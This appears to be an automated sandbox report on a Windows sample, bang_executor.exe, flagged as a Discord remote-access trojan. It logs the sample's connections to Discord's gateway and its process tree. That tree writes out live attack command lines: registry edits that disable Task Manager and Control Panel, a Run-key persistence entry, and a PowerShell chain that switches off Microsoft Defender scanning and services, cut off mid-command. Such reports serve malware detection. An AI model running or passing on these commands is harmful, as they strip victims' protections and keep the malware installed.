                                      .text0x10000x345cc0x34600b7a8b04ab2248443b05e8133fb3a9064False0.5887343377088305data6.708390817791953IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x360000xb4100xb600a418919d63b67e937555eec95d3b6bcbFalse0.45409083104395603Applesoft BASIC program data, first line number 45.215945456388312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x420000x247580x1200d8d5c95192b51ddad1857caa38e7daa9False0.4049479166666667data4.078919796039023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .didat0x670000x1a40x200ee74a17c4eeb586c9811481b77498b43False0.4609375data3.5194570553957747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x680000x4698c0x46a0063c467fae2a86ee53a2cedff6cddbf84False0.1831339878318584data2.8883832145704766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xaf0000x255c0x2600699c6b2b1b2acad2d0f219d9328713afFalse0.783203125data6.6660836278877325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      PNG0x685240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                      PNG0x6906c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                      RT_ICON0x6a6180x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2621440.15086028345711158
                                      RT_DIALOG0xac6400x286dataEnglishUnited States0.5092879256965944
                                      RT_DIALOG0xac8c80x13adataEnglishUnited States0.60828025477707
                                      RT_DIALOG0xaca040xecdataEnglishUnited States0.6991525423728814
                                      RT_DIALOG0xacaf00x12edataEnglishUnited States0.5927152317880795
                                      RT_DIALOG0xacc200x338dataEnglishUnited States0.45145631067961167
                                      RT_DIALOG0xacf580x252dataEnglishUnited States0.5757575757575758
                                      RT_STRING0xad1ac0x1e2dataEnglishUnited States0.3900414937759336
                                      RT_STRING0xad3900x1ccdataEnglishUnited States0.4282608695652174
                                      RT_STRING0xad55c0x1b8dataEnglishUnited States0.45681818181818185
                                      RT_STRING0xad7140x146dataEnglishUnited States0.5153374233128835
                                      RT_STRING0xad85c0x46cdataEnglishUnited States0.3454063604240283
                                      RT_STRING0xadcc80x166dataEnglishUnited States0.49162011173184356
                                      RT_STRING0xade300x152dataEnglishUnited States0.5059171597633136
                                      RT_STRING0xadf840x10adataEnglishUnited States0.49624060150375937
                                      RT_STRING0xae0900xbcdataEnglishUnited States0.6329787234042553
                                      RT_STRING0xae14c0xd6dataEnglishUnited States0.5747663551401869
                                      RT_GROUP_ICON0xae2240x14data1.1
                                      RT_MANIFEST0xae2380x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39786666666666665

                                      Imports

                                      DLLImport
                                      KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                      gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Feb 15, 2024 18:14:52.269220114 CET49729443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.269311905 CET44349729162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.269403934 CET49729443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.311702013 CET49729443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.311785936 CET44349729162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.512159109 CET49730443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.512238026 CET44349730162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.512321949 CET49730443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.513292074 CET44349729162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.513676882 CET49729443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.521985054 CET49729443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.522016048 CET44349729162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.522461891 CET44349729162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.524766922 CET49730443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.524782896 CET44349730162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.575810909 CET49729443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.620212078 CET49729443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.665906906 CET44349729162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.710494995 CET44349730162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.710859060 CET49730443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.737051010 CET49730443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.737077951 CET44349730162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.737411022 CET44349730162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.754947901 CET44349729162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.755100012 CET44349729162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:52.755363941 CET49729443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.764010906 CET49729443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.778908968 CET49730443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.901117086 CET49730443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:52.941909075 CET44349730162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:53.030802965 CET44349730162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:53.030909061 CET44349730162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:14:53.031193972 CET49730443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:14:53.036541939 CET49730443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:00.303929090 CET49739443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:00.304012060 CET44349739162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:00.304301023 CET49739443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:00.316705942 CET49739443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:00.316783905 CET44349739162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:00.501857996 CET44349739162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:00.501935005 CET49739443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:00.506978989 CET49739443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:00.507004023 CET44349739162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:00.507198095 CET44349739162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:00.560302019 CET49739443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:00.621280909 CET49739443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:00.662003994 CET44349739162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:00.759553909 CET44349739162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:00.759608984 CET44349739162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:00.759776115 CET49739443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:00.762785912 CET49739443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:08.797833920 CET49751443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:08.797935963 CET44349751162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:08.798019886 CET49751443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:08.807660103 CET49751443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:08.807701111 CET44349751162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:08.995923042 CET44349751162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:08.996093988 CET49751443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:08.998661995 CET49751443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:08.998687983 CET44349751162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:08.999118090 CET44349751162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:09.044646978 CET49751443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:09.075042963 CET49751443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:09.117942095 CET44349751162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:09.257384062 CET44349751162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:09.257559061 CET44349751162.159.136.234192.168.2.4
                                      Feb 15, 2024 18:15:09.257616997 CET49751443192.168.2.4162.159.136.234
                                      Feb 15, 2024 18:15:09.260412931 CET49751443192.168.2.4162.159.136.234

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Feb 15, 2024 18:14:52.119832993 CET5793553192.168.2.41.1.1.1
                                      Feb 15, 2024 18:14:52.208641052 CET53579351.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Feb 15, 2024 18:14:52.119832993 CET192.168.2.41.1.1.10x5381Standard query (0)gateway.discord.ggA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Feb 15, 2024 18:14:52.208641052 CET1.1.1.1192.168.2.40x5381No error (0)gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                      Feb 15, 2024 18:14:52.208641052 CET1.1.1.1192.168.2.40x5381No error (0)gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                      Feb 15, 2024 18:14:52.208641052 CET1.1.1.1192.168.2.40x5381No error (0)gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                      Feb 15, 2024 18:14:52.208641052 CET1.1.1.1192.168.2.40x5381No error (0)gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                      Feb 15, 2024 18:14:52.208641052 CET1.1.1.1192.168.2.40x5381No error (0)gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • gateway.discord.gg

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449729162.159.136.2344431236C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      TimestampBytes transferredDirectionData
                                      2024-02-15 17:14:52 UTC187OUTGET /?v=9&encording=json HTTP/1.1
                                      Connection: Upgrade,Keep-Alive
                                      Upgrade: websocket
                                      Sec-WebSocket-Key: JZZV0wLYGWIArUk7blYl6g==
                                      Sec-WebSocket-Version: 13
                                      Host: gateway.discord.gg
                                      2024-02-15 17:14:52 UTC618INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Feb 2024 17:14:52 GMT
                                      Content-Length: 0
                                      Connection: close
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gf5S58277ctmcHDr2F3eKBmVHGRh%2BLXS1%2BE5PO504UiM7awvLASVT61pRN89tvvA5abcG1wv0UC2IymOWJ%2Bs5aFnRfJSS8JJgWD9pfhMdb5wyrGMDcBVUmm%2BnjEwsW%2FStr3G9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      X-Content-Type-Options: nosniff
                                      Server: cloudflare
                                      CF-RAY: 855f308f3b314315-EWR


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449730162.159.136.2344437572C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      TimestampBytes transferredDirectionData
                                      2024-02-15 17:14:52 UTC187OUTGET /?v=9&encording=json HTTP/1.1
                                      Connection: Upgrade,Keep-Alive
                                      Upgrade: websocket
                                      Sec-WebSocket-Key: aYUnNI1T2trVUmXeoUmoSw==
                                      Sec-WebSocket-Version: 13
                                      Host: gateway.discord.gg
                                      2024-02-15 17:14:53 UTC620INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Feb 2024 17:14:52 GMT
                                      Content-Length: 0
                                      Connection: close
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TjEZVX6W2%2F7LeJAGd%2FLHKuQUR7qHPoRvppXrG4MiNbinv7vxjGwJjmW5N93qHkPsRtrsZ%2BbGo3xHovXoVizw0bo37XaVi2MVt7B4UBcb%2FQN%2BT0Yf4o9W7%2FRpalWvyPnalAKP8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      X-Content-Type-Options: nosniff
                                      Server: cloudflare
                                      CF-RAY: 855f3090ecdc43b6-EWR


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.449739162.159.136.2344437356C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      TimestampBytes transferredDirectionData
                                      2024-02-15 17:15:00 UTC187OUTGET /?v=9&encording=json HTTP/1.1
                                      Connection: Upgrade,Keep-Alive
                                      Upgrade: websocket
                                      Sec-WebSocket-Key: +ZQ8YwwGC+gtFcLWIAD8fQ==
                                      Sec-WebSocket-Version: 13
                                      Host: gateway.discord.gg
                                      2024-02-15 17:15:00 UTC612INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Feb 2024 17:15:00 GMT
                                      Content-Length: 0
                                      Connection: close
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DlNrVeh4%2FAHe4zGlXnfoRcTO0xUuNb1iwAP4JwQtjPUG0Nebl9oSCwBIWYcUWzOiPbKcfFg7M%2BqvkwDJULOKzJik0GCZUeEJRvlLa4D040Q14yzfKjcUUSZ95DPJnu4F0ghAzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      X-Content-Type-Options: nosniff
                                      Server: cloudflare
                                      CF-RAY: 855f30c13afb8c9c-EWR


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.449751162.159.136.2344437968C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      TimestampBytes transferredDirectionData
                                      2024-02-15 17:15:09 UTC187OUTGET /?v=9&encording=json HTTP/1.1
                                      Connection: Upgrade,Keep-Alive
                                      Upgrade: websocket
                                      Sec-WebSocket-Key: Du49Via+t800c0yCUOPmaQ==
                                      Sec-WebSocket-Version: 13
                                      Host: gateway.discord.gg
                                      2024-02-15 17:15:09 UTC612INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Feb 2024 17:15:09 GMT
                                      Content-Length: 0
                                      Connection: close
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VDjwJ6%2FAcpprXBh%2BLBImLVkoqsgddK96zslF6O1jFcimiwsKpVeEE8TqaM4KEo0SbP1wju1oGZwq8BYrx2mz8p6RTmpdNFzmFz7dtPpEa9KImtjalUpvIpBIF9s2vXERSFp0wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      X-Content-Type-Options: nosniff
                                      Server: cloudflare
                                      CF-RAY: 855f30f648580f7f-EWR


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:18:14:48
                                      Start date:15/02/2024
                                      Path:C:\Users\user\Desktop\bang_executor.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\bang_executor.exe
                                      Imagebase:0x4e0000
                                      File size:678'979 bytes
                                      MD5 hash:043E699DBF3D88B6CCA5FBE64229BA27
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:18:14:49
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat" "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:18:14:49
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:18:14:49
                                      Start date:15/02/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      Wow64 process (32bit):false
                                      Commandline:bang_executor.exe
                                      Imagebase:0x230771e0000
                                      File size:351'232 bytes
                                      MD5 hash:E1EAD094E52097B884389A8064B15E2B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DicrordRat, Description: Yara detected Dicrord Rat, Source: 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DicrordRat, Description: Yara detected Dicrord Rat, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe
                                      Wow64 process (32bit):false
                                      Commandline:executer.exe
                                      Imagebase:0x990000
                                      File size:280'576 bytes
                                      MD5 hash:88E22186F196CC0E1E2D500EEAC57337
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 48%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /K instaling.bat
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:6
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /K mgr.bat
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:8
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:9
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:10
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /K microsoft.bat
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:11
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:12
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
                                      Imagebase:0xee0000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                      Imagebase:0xee0000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f
                                      Imagebase:0xee0000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path 